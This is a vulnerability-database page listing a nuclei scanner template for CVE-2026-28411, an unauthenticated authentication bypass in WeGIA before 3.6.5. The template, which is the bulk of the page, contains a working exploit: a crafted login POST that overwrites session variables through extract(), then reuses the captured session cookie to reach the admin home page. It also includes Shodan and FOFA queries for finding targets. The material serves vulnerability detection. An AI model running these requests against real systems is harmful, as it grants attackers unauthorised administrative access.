Lucene search
+L

WeGIA < 3.6.5 - Unauthenticated Authentication Bypass via extract()

🗓️ 07 Sep 2026 06:34:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com

Unauthenticated auth bypass in WeGIA < 3.6.5 via extract() on $_REQUEST.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-28411
27 Feb 202621:52
–attackerkb
circl
Circl
CVE-2026-28411
28 Feb 202600:00
–circl
cnnvd
CNNVD
WeGIA 安全漏洞
27 Feb 202600:00
–cnnvd
cve
CVE
CVE-2026-28411
27 Feb 202621:52
–cve
cvelist
Cvelist
CVE-2026-28411 WeGIA Vulnerable to Authentication Bypass via `extract($_REQUEST)`
27 Feb 202621:52
–cvelist
euvd
EUVD
EUVD-2026-9081
27 Feb 202621:52
–euvd
nvd
NVD
CVE-2026-28411
27 Feb 202622:16
–nvd
ptsecurity
Positive Technologies
PT-2026-22413
27 Feb 202600:00
–ptsecurity
redhatcve
RedhatCVE
CVE-2026-28411
1 Mar 202601:43
–redhatcve
vulnrichment
Vulnrichment
CVE-2026-28411 WeGIA Vulnerable to Authentication Bypass via `extract($_REQUEST)`
27 Feb 202621:52
–vulnrichment
id: CVE-2026-28411

info:
  name: WeGIA < 3.6.5 - Unauthenticated Authentication Bypass via extract()
  author: str4k3r,0x_Akoko
  severity: critical
  description: |
    WeGIA < 3.6.5 contains an authentication bypass caused by unsafe use of extract() on $_REQUEST, letting unauthenticated attackers bypass authentication and access protected areas, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can bypass authentication and gain unauthorized administrative access.
  remediation: |
    Upgrade to version 3.6.5 or later.
  reference:
    - https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jg7w-3wg7-4vhh
    - https://nvd.nist.gov/vuln/detail/CVE-2026-28411
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-28411
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    vendor: labredescefetrj
    product: wegia
    shodan-query: http.html:"WeGIA"
    fofa-query: body="WeGIA"
  tags: cve,cve2026,wegia,auth-bypass,extract,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /WeGIA/html/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cpf=admin&c=true&id_pessoa=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "PHPSESSID")'
          - 'contains(header, "home.php")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        GET /WeGIA/html/home.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{sessid}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "wegia", "menu", "processo", "funcionario")'
          - '!contains_any(tolower(body), "login", "cpf", "senha")'
        condition: and
# digest: 4a0a00473045022027d1fc8c9e7f71f7070a78cdfa31773831e124bf37b32515b6ea705647a50776022100a88d7fd7d12ba508b41513aae2e428a47fe7d41e1c0b422a3c7b9e2b0dfc6284:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Sep 2026 07:13Current
CVSS 3.19.8
EPSS0.00593
SSVC
0